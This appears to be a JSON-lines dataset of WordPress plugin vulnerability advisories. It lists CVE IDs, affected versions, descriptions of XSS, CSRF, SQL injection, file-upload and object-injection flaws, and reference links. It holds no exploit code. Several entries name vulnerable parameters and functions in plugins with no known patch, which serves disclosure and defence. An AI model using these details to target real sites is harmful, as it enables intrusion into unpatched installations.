{"CVE_ID":"CVE-2023-2402","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.13","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51a1c2de-56be-4487-874a-a916e8a6992a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51a1c2de-56be-4487-874a-a916e8a6992a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808029%40wp-responsive-photo-gallery%2Ftags%2F1.0.13&new=2905480%40wp-responsive-photo-gallery%2Ftags%2F1.0.14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808029%40wp-responsive-photo-gallery%2Ftags%2F1.0.13&new=2905480%40wp-responsive-photo-gallery%2Ftags%2F1.0.14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4422","slug":"post-smtp","versionImpact":"2.0.20","description":"The POST SMTP Mailer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.20. This is due to missing or incorrect nonce validation on the handleCsvExport() function. This makes it possible for unauthenticated attackers to trigger a CSV export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e018ca7c-06dd-4d40-91d4-4ed188b8aaf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e018ca7c-06dd-4d40-91d4-4ed188b8aaf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473579%40post-smt
p&new=2473579%40post-smtp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473579%40post-smtp&new=2473579%40post-smtp&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1906","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxAddCategory function. This makes it possible for unauthenticated attackers to add categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6022","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/871a93b5-ec67-4fe0-bc39-e5485477fbeb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/871a93b5-ec67-4fe0-bc39-e5485477fbeb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6894","slug":"integracao-rd-station","versionImpact":"5.3.2","description":"The RD Station plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping of post metaboxes added by the plugin. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5075a8-1da1-4738-ad4b-b6c323d772ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5075a8-1da1-4738-ad4b-b6c323d772ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-rd-station\\\/trunk\\\/metaboxes\\\/add_custom_scripts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-rd-station\\\/trunk\\\/metaboxes\\\/add_custom_scripts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integracao-rd-station\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integracao-rd-station\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9220","slug":"lh-copy-media-file","versionImpact":"1.08","description":"The LH Copy Media File plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.08. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9911e99e-0b3b-4be1-b8cd-28593b6d12ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9911e99e-0b3b-4be1-b8cd-28593b6d12ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-copy-media-file\\\/trunk\\\/lh-copy-media-file.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-copy-media-file\\\/trunk\\\/lh-copy-media-file.php#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9898","slug":"parallax-image","versionImpact":"1.8","description":"The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dd-parallax shortcode in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57641366-85d3-4375-8cde-041227c9f811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57641366-85d3-4375-8cde-041227c9f811?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/trunk\\\/assets\\\/shortcode.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/trunk\\\/assets\\\/shortcode.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/#file16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/#file16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10325","slug":"header-footer-elementor","versionImpact":"1.6.45","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7773fd3a-2417-415e-97b0-735e99e62097?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7773fd3a-2417-415e-97b0-735e99e62097?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182862\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10886","slug":"tribute-testimonial-gridslider","versionImpact":"1.0.4","description":"The Tribute Testimonials \u2013 WordPress Testimonial Grid\/Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tribute_testimonials_slider' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tribute-testimonial-gridslider\\\/tags\\\/1.0.4\\\/includes\\\/class-tribute-shortcode-generator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tribute-testimonial-gridslider\\\/tags\\\/1.0.4\\\/includes\\\/class-tribute-shortcode-generator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e461095-8dce-4502-8bbf-8c985105cf24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e461095-8dce-4502-8bbf-8c985105cf24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12258","slug":"wp-service-payment-form-with-authorizenet","versionImpact":"2.6.3","description":"The WP Service Payment Form With Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-service-payment-form-with-authorizenet\\\/trunk\\\/src\\\/wpspf-payments-list.php#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-service-payment-form-with-authorizenet\\\/trunk\\\/src\\\/wpspf-payments-list.php#L320\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478a5b3-58ef-410e-801f-82eaa579941a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478a5b3-58ef-410e-801f-82eaa579941a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0796","slug":"wprequal","versionImpact":"8.2.10","description":"The Mortgage Lead Capture System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.2.10. This is due to missing or incorrect nonce validation on the 'wprequal_reset_defaults' action. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wprequal\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wprequal\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/316b807c-06ca-4448-acb9-80766a07258a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/316b807c-06ca-4448-acb9-80766a07258a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13831","slug":"wc-tabs","versionImpact":"1.0.0","description":"The Tabs for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input in the 'product_has_custom_tabs' function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-tabs\\\/trunk\\\/wc-tabs-lite.php#L363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-tabs\\\/trunk\\\/wc-tabs-lite.php#L363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790a2c64-b358-41ed-be17-f2b99d294617?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790a2c64-b358-41ed-be17-f2b99d294617?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2512","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation in the upload() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_management.php#L1094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_management.php#L1094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a93313d-a5d7-4109-93c5-b2da26e7a486?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a93313d-a5d7-4109-93c5-b2da26e7a486?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1471","slug":"wp-popup-banners","versionImpact":"1.2.5","description":"The WP Popup Banners plugin for WordPress is vulnerable to SQL Injection via the 'banner_id' parameter in versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L243\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8281cb20-73d3-4ab5-910e-d353b2a5cbd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8281cb20-73d3-4ab5-910e-d353b2a5cbd8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1019","slug":"helpdeskwp","versionImpact":"1.2.0","description":"The Help Desk WP WordPress plugin through 1.2.0 does not sanitise and escape some parameters, which could allow users with a role as low as Editor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6331ca8-9603-4134-af39-8e77ac9d511c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6331ca8-9603-4134-af39-8e77ac9d511c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4421","slug":"advanced-popups","versionImpact":"1.1.1","description":"The Advanced Popups plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the metabox_popup_save() function. This makes it possible for unauthenticated attackers to save meta tags via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548724%40advanced-popups&new=2548724%40advanced-popups&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548724%40advanced-popups&new=2548724%40advanced-popups&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc7b51e5-6eb7-41ba-add3-f083fb34c5e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc7b51e5-6eb7-41ba-add3-f083fb34c5e1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1653","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxUpdateFolderPosition in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the folder position of categories as well as update the metadata of other taxonomies.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6132","slug":"wp-pexels-free-stock-photos","versionImpact":"1.2.2","description":"The Pexels: Free Stock Photos plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'pexels_fsp_images_options_validate' function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79dd492e-d4da-4209-83a8-d8059263ae92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79dd492e-d4da-4209-83a8-d8059263ae92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-pexels-free-stock-photos\\\/trunk\\\/settings.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-pexels-free-stock-photos\\\/trunk\\\/settings.php#L239\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9209","slug":"search-analytics","versionImpact":"1.4.10","description":"The WP Search Analytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/275268d6-5b08-441d-9924-3c99682b27d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/275268d6-5b08-441d-9924-3c99682b27d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-analytics\\\/tags\\\/1.4.9\\\/admin\\\/includes\\\/class.stats-table.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-analytics\\\/tags\\\/1.4.9\\\/admin\\\/includes\\\/class.stats-table.php#L153\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9184","slug":"sendpulse-web-push","versionImpact":"1.3.6","description":"The SendPulse Free Web Push plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.6 due to incorrect use of the wp_kses_allowed_html function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sendpulse-web-push\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sendpulse-web-push\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpulse-web-push\\\/trunk\\\/settings.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpulse-web-push\\\/trunk\\\/settings.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169899\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169899\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
